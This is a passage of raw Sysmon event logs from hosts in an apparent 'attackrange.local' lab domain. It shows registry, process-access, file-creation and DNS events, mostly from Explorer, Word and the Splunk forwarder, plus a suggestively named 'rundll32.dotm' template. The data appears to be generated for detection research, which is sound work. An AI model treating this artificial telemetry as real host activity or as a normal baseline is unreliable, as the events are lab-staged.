19:19:10.809{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001606848Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:10.809{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 11241100x80000000000000001606847Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.793{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606846Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.793{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=023C298990AC6719962E4CA2B29DA131,SHA256=71262056114D321FE6BB71E01CB8C0EDFEE5F0BA142865D31B77508A9613EA77falsefalse - insufficient disk space 13241300x80000000000000001606845Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.792{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606844Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.792{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 23542300x80000000000000001095415Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.993{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C7C72CE4DD6EB8F644E559596D600EC,SHA256=63D708871D942CA2DA340E12FB912A50BEC5CE9959A03AA04005EE3A7B6404C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095414Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.657{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AAE-6080-9D5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095413Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.656{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095412Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.656{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095411Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.656{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095410Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.655{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095409Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.655{761B69BB-818A-607D-0500-00000000BA01}408532C:\Windows\system32\csrss.exe{761B69BB-7AAE-6080-9D5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095408Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.655{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AAE-6080-9D5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095407Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.654{761B69BB-7AAE-6080-9D5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001095406Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095405Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095404Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.131{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48183CF83E605A25328217037FDE4E36,SHA256=27F24463234567260A3E2DF69DEB10A45B8D5E49D51829F20E40B1D6360837A4,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001606843Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.756{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0Binary Data 13241300x80000000000000001606842Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.756{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Word\Data\SettingsBinary Data 23542300x80000000000000001606841Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.693{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{4ECC9FC5-CBED-4182-9AE9-8FE8A27EDD92}.tmpMD5=5D4D94EE7E06BBB0AF9584119797B23A,SHA256=4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1falsefalse - insufficient disk space 23542300x80000000000000001606840Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.693{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\Desktop\~$_doc1_rundll32.dotmMD5=9D38DD14FE73C4644ACC4B09B76CBCC1,SHA256=9E9839055DCC6C3ED506956752AAC8644F0C3ED5F2AB6C3CC097779C5162DFDDfalsefalse - insufficient disk space 13241300x80000000000000001606839Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.671{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Common\Toolbars\Settings\Microsoft WordBinary Data 13241300x80000000000000001606838Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.593{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606837Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.593{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.RkcybereBinary Data 13241300x80000000000000001606836Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.593{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001606835Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:10.593{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 10341000x80000000000000001606834Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.593{21761711-84C9-607D-F200-00000000BB01}37845700C:\Windows\Explorer.EXE{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606833Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.590{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606832Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.590{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606831Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.339{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606830Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.339{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A7072D613135A98E1933758599669BB,SHA256=5DEE7351E8D26A7BD32B3B78AA60A9D5AD0A8DEFB5063F3D3C2B5A78836EA7B6falsefalse - insufficient disk space 10341000x80000000000000001095403Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.125{761B69BB-7AAD-6080-9C5F-00000000BA01}33164668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606884Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.912{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 11241100x80000000000000001606883Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.912{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606882Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.912{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E7B9A8EA4057A6FAA80F9FA16F17716B,SHA256=BA7D40D201B45F3ABF36421E2296402DFBA7680A4E97E72E5E4E3565F4354605falsefalse - insufficient disk space 23542300x80000000000000001606881Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:11.912{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28AA620D0729A95FF1047552327A8538,SHA256=C467E035B930A2BFC9DC1AF143EEA3DB34F866FFCF4DC2A3A42E2DE4B1F11022falsefalse - insufficient disk space 354300x80000000000000001095428Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.474{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-982.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal64935- 10341000x80000000000000001095427Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095426Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.480{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095425Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.458{761B69BB-7AAF-6080-9E5F-00000000BA01}34485448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095424Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.324{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AAF-6080-9E5F-00000000BA01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095423Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.322{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095422Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:11.322{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095421Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 